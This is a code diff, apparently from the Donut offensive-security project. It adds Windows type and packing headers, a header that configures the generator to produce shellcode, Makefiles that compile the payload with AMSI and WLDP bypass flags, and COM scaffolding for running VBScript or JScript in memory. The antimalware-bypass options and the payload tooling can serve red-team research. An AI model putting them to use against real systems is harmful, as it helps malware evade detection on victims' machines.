425
426 typedef struct _IMAGE_EXPORT_DIRECTORY {
427 DWORD Characteristics;
428 DWORD TimeDateStamp;
429 WORD MajorVersion;
430 WORD MinorVersion;
431 DWORD Name;
432 DWORD Base;
433 DWORD NumberOfFunctions;
434 DWORD NumberOfNames;
435 DWORD AddressOfFunctions; // RVA from base of image
436 DWORD AddressOfNames; // RVA from base of image
437 DWORD AddressOfNameOrdinals; // RVA from base of image
438 } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
439
440 #endif
+37
-0
include/poppack.h less more
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 poppack.h
7
8 Abstract:
9
10 This file turns packing of structures off. (That is, it enables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways.
13
14 poppack.h is the complement to pshpack?.h. An inclusion of poppack.h
15 MUST ALWAYS be preceded by an inclusion of one of pshpack?.h, in one-to-one
16 correspondence.
17
18 For Microsoft compatible compilers, this file uses the pop option
19 to the pack pragma so that it can restore the previous saved by the
20 pshpack?.h include file.
21
22 --*/
23
24 #if ! (defined(lint) || defined(RC_INVOKED))
25 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
26 #pragma warning(disable:4103)
27 #if !(defined( MIDL_PASS )) || defined( __midl )
28 #pragma pack(pop)
29 #else
30 #pragma pack()
31 #endif
32 #else
33 #pragma pack()
34 #endif
35 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
36
+34
-0
include/pshpack1.h less more
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 pshpack1.h
7
8 Abstract:
9
10 This file turns 1 byte packing of structures on. (That is, it disables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways. For Microsoft
13 compatible compilers, this files uses the push option to the pack pragma
14 so that the poppack.h include file can restore the previous packing
15 reliably.
16
17 The file poppack.h is the complement to this file.
18
19 --*/
20
21 #if ! (defined(lint) || defined(RC_INVOKED))
22 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
23 #pragma warning(disable:4103)
24 #if !(defined( MIDL_PASS )) || defined( __midl )
25 #pragma pack(push,1)
26 #else
27 #pragma pack(1)
28 #endif
29 #else
30 #pragma pack(1)
31 #endif
32 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33
+34
-0
include/pshpack2.h less more
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 pshpack2.h
7
8 Abstract:
9
10 This file turns 2 byte packing of structures on. (That is, it disables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways. For Microsoft
13 compatible compilers, this files uses the push option to the pack pragma
14 so that the poppack.h include file can restore the previous packing
15 reliably.
16
17 The file poppack.h is the complement to this file.
18
19 --*/
20
21 #if ! (defined(lint) || defined(RC_INVOKED))
22 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
23 #pragma warning(disable:4103)
24 #if !(defined( MIDL_PASS )) || defined( __midl )
25 #pragma pack(push,2)
26 #else
27 #pragma pack(2)
28 #endif
29 #else
30 #pragma pack(2)
31 #endif
32 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33
+34
-0
include/pshpack4.h less more
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 pshpack4.h
7
8 Abstract:
9
10 This file turns 4 byte packing of structures on. (That is, it disables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways. For Microsoft
13 compatible compilers, this files uses the push option to the pack pragma
14 so that the poppack.h include file can restore the previous packing
15 reliably.
16
17 The file poppack.h is the complement to this file.
18
19 --*/
20
21 #if ! (defined(lint) || defined(RC_INVOKED))
22 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
23 #pragma warning(disable:4103)
24 #if !(defined( MIDL_PASS )) || defined( __midl )
25 #pragma pack(push,4)
26 #else
27 #pragma pack(4)
28 #endif
29 #else
30 #pragma pack(4)
31 #endif
32 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33
+34
-0
include/pshpack8.h less more
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 pshpack8.h
7
8 Abstract:
9
10 This file turns 8 byte packing of structures on. (That is, it disables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways. For Microsoft
13 compatible compilers, this files uses the push option to the pack pragma
14 so that the poppack.h include file can restore the previous packing
15 reliably.
16
17 The file poppack.h is the complement to this file.
18
19 --*/
20
21 #if ! (defined(lint) || defined(RC_INVOKED))
22 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
23 #pragma warning(disable:4103)
24 #if !(defined( MIDL_PASS )) || defined( __midl )
25 #pragma pack(push,8)
26 #else
27 #pragma pack(8)
28 #endif
29 #else
30 #pragma pack(8)
31 #endif
32 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33
+98
-0
include/wintypes.h less more
0 #pragma once
1 #if _MSC_VER
2 #define USE_WINNT
3 #include <windows.h>
4 #endif
5 #ifndef USE_WINNT
6
7 #ifndef __WIN_TYPES
8 #define __WIN_TYPES__
9
10 /*
11 #if _MSC_VER
12 #ifndef snprintf
13 #define snprintf _snprintf
14 #endif
15 #ifndef snscanf
16 #define snscanf _snscanf
17 #endif
18 #endif
19 */
20
21 #ifdef _MSC_VER
22 #include <stdint.h>
23 #else
24 #include <inttypes.h>
25 #endif
26
27 #ifndef FALSE
28 #define FALSE 0
29 #endif
30
31 #ifndef TRUE
32 #define TRUE 1
33 #endif
34
35 #ifndef BYTE
36 typedef unsigned char BYTE;
37 #endif
38
39 #ifndef BOOLEAN
40 typedef BYTE BOOLEAN;
41 #endif
42
43 #ifndef BOOL
44 typedef BYTE BOOL;
45 #endif
46
47 #ifndef WORD
48 typedef uint16_t WORD;
49 #endif
50
51 #ifndef USHORT
52 typedef uint16_t USHORT;
53 #endif
54
55 #ifndef DWORD
56 typedef uint32_t DWORD;
57 #endif
58
59 #ifndef ULONG
60 typedef uint32_t ULONG;
61 #endif
62
63 #ifndef ULONGLONG
64 typedef int64_t ULONGLONG;
65 #endif
66
67 #ifndef ULONGULONG
68 typedef uint64_t ULONGULONG;
69 #endif
70
71 #ifndef CHAR
72 typedef char CHAR;
73 #endif
74
75 // wchar_t is 32-bits on Linux
76 #ifndef WCHAR
77 typedef uint16_t WCHAR;
78 #endif
79
80 // this might be a problem..
81 #ifndef ULONG_PTR
82 typedef ULONGULONG *ULONG_PTR;
83 #endif
84
85 #ifndef VOID
86 #define VOID void
87 typedef char CHAR;
88 typedef uint16_t SHORT;
89 typedef uint32_t LONG;
90
91 #if !defined(MIDL_PASS)
92 typedef int INT;
93 #endif
94 #endif //VOID
95
96 #endif // __WIN_TYPES__
97 #endif // #ifndef USE_WINNT
+129
-0
lib/donut.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef DONUT_H
32 #define DONUT_H
33
34 #include <stdint.h>
35 #include <stdio.h>
36 #include <stdlib.h>
37 #include <string.h>
38 #include <sys/stat.h>
39 #include <inttypes.h>
40
41 #define DONUT_ERROR_SUCCESS 0
42 #define DONUT_ERROR_FILE_NOT_FOUND 1
43 #define DONUT_ERROR_FILE_EMPTY 2
44 #define DONUT_ERROR_FILE_ACCESS 3
45 #define DONUT_ERROR_FILE_INVALID 4
46 #define DONUT_ERROR_NET_PARAMS 5
47 #define DONUT_ERROR_NO_MEMORY 6
48 #define DONUT_ERROR_INVALID_ARCH 7
49 #define DONUT_ERROR_INVALID_URL 8
50 #define DONUT_ERROR_URL_LENGTH 9
51 #define DONUT_ERROR_INVALID_PARAMETER 10
52 #define DONUT_ERROR_RANDOM 11
53 #define DONUT_ERROR_DLL_FUNCTION 12
54 #define DONUT_ERROR_ARCH_MISMATCH 13
55 #define DONUT_ERROR_DLL_PARAM 14
56 #define DONUT_ERROR_BYPASS_INVALID 15
57
58 // target architecture
59 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
60 #define DONUT_ARCH_X86 1 // x86
61 #define DONUT_ARCH_X64 2 // AMD64
62 #define DONUT_ARCH_X84 3 // AMD64 + x86
63
64 // module type
65 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
66 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
67 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
68 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
69 #define DONUT_MODULE_VBS 5 // VBScript
70 #define DONUT_MODULE_JS 6 // JavaScript or JScript
71 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
72
73 // instance type
74 #define DONUT_INSTANCE_PIC 1 // Self-contained
75 #define DONUT_INSTANCE_URL 2 // Download from remote server
76
77 // AMSI/WLDP options
78 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
79 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
80 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
81
82 // apparently C# can support 2^16 or 65,536 parameters
83 // we support up to eight for now :)
84 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
85 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
86 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
87 #define DONUT_MAX_URL 256
88 #define DONUT_MAX_MODNAME 8
89 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
90 #define DONUT_VER_LEN 32
91 #define DONUT_DOMAIN_LEN 8
92
93 typedef struct _DONUT_CONFIG {
94 int arch; // target architecture for shellcode
95 int bypass; // bypass option for AMSI/WDLP
96 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
97 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
98 char method[DONUT_MAX_NAME]; // name of method to execute
99 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
100 char file[DONUT_MAX_NAME]; // assembly to create module from
101 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
102 char runtime[DONUT_MAX_NAME]; // runtime version to use.
103 char modname[DONUT_MAX_NAME]; // name of module written to disk
104
105 int mod_type; // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL
106 uint64_t mod_len; // size of DONUT_MODULE
107 void *mod; // points to donut module
108
109 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
110 uint64_t inst_len; // size of DONUT_INSTANCE
111 void *inst; // points to donut instance
112
113 uint64_t pic_len; // size of shellcode
114 void *pic; // points to PIC/shellcode
115 } DONUT_CONFIG, *PDONUT_CONFIG;
116
117 #ifdef __cplusplus
118 extern "C" {
119 #endif
120
121 int DonutCreate(PDONUT_CONFIG);
122 int DonutDelete(PDONUT_CONFIG);
123
124 #ifdef __cplusplus
125 }
126 #endif
127
128 #endif
+12
-0
payload/Makefile.mingw less more
0 x64:
1 x86_64-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
2 exe2h/exe2h payload.exe
3 x86:
4 i686-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
5 exe2h/exe2h payload.exe
6 debug_x64:
7 x86_64-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
8 debug_x86:
9 i686-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
10 clean:
11 rm *.o payload.exe
+9
-0
payload/Makefile.msvc less more
0 payload:
1 cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
2 link -nologo -order:@order.txt -entry:ThreadProc -fixed -subsystem:console -nodefaultlib payload.obj hash.obj encrypt.obj clib.obj
3 exe2h\exe2h payload.exe
4 debug:
5 cl -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
6 link -nologo -order:@order.txt -subsystem:console payload.obj hash.obj encrypt.obj clib.obj
7 clean:
8 del *.obj payload.exe
+186
-0
payload/activescript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize virtual function table
32 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
33 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
34
35 // Initialize IUnknown
36 mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
37 mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
38 mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
39
40 // Initialize IActiveScriptSite
41 mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
42 mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
43 mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
44 mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
45 mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
46 mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
47 mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
48 mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
49
50 mas->site.m_cRef = 0;
51 mas->inst = inst;
52 }
53
54 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
55 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
56
57 DPRINT("IActiveScriptSite::QueryInterface");
58
59 if(ppv == NULL) return E_POINTER;
60
61 // we implement the following interfaces
62 if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
63 IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
64 {
65 *ppv = (LPVOID)this;
66 ActiveScript_AddRef(this);
67 return S_OK;
68 }
69 *ppv = NULL;
70 return E_NOINTERFACE;
71 }
72
73 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
74 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
75
76 _InterlockedIncrement(&mas->site.m_cRef);
77
78 DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
79
80 return mas->site.m_cRef;
81 }
82
83 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
84 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
85
86 ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
87
88 DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
89 return ulRefCount;
90 }
91
92 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
93 LPCOLESTR objectName, DWORD dwReturnMask,
94 IUnknown **objPtr, ITypeInfo **ppti)
95 {
96 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
97
98 DPRINT("IActiveScriptSite::GetItemInfo");
99
100 if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
101 DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
102 if(ppti == NULL) return E_POINTER;
103
104 mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
105 *ppti = mas->wscript.lpTypeInfo;
106 }
107
108 if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
109 DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
110 if(objPtr == NULL) return E_POINTER;
111
112 mas->wscript.lpVtbl->AddRef(&mas->wscript);
113 *objPtr = (IUnknown*)&mas->wscript;
114 }
115
116 return S_OK;
117 }
118
119 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
120 IActiveScriptError *scriptError)
121 {
122 DPRINT("IActiveScriptSite::OnScriptError");
123
124 EXCEPINFO ei;
125 DWORD dwSourceContext = 0;
126 ULONG ulLineNumber = 0;
127 LONG ichCharPosition = 0;
128 HRESULT hr;
129
130 Memset(&ei, 0, sizeof(EXCEPINFO));
131
132 DPRINT("IActiveScriptError::GetExceptionInfo");
133 hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
134 if(hr == S_OK) {
135 DPRINT("IActiveScriptError::GetSourcePosition");
136 hr = scriptError->lpVtbl->GetSourcePosition(
137 scriptError, &dwSourceContext,
138 &ulLineNumber, &ichCharPosition);
139 if(hr == S_OK) {
140 DPRINT("JSError: %ws line[%d:%d]\n",
141 ei.bstrDescription, ulLineNumber, ichCharPosition);
142 }
143 }
144 return S_OK;
145 }
146
147 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
148 DPRINT("IActiveScriptSite::GetLCID");
149 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
150
151 *plcid = mas->inst->api.GetUserDefaultLCID();
152 return S_OK;
153 }
154
155 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
156 DPRINT("IActiveScriptSite::GetDocVersionString");
157
158 return S_OK;
159 }
160
161 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
162 const VARIANT *pvr, const EXCEPINFO *pei)
163 {
164 DPRINT("IActiveScriptSite::OnScriptTerminate");
165
166 return S_OK;
167 }
168
169 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
170 DPRINT("IActiveScriptSite::OnStateChange");
171
172 return S_OK;
173 }
174
175 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
176 DPRINT("IActiveScriptSite::OnEnterScript");
177
178 return S_OK;
179 }
180
181 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
182 DPRINT("IActiveScriptSite::OnLeaveScript");
183
184 return S_OK;
185 }
+436
-0
payload/activescript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
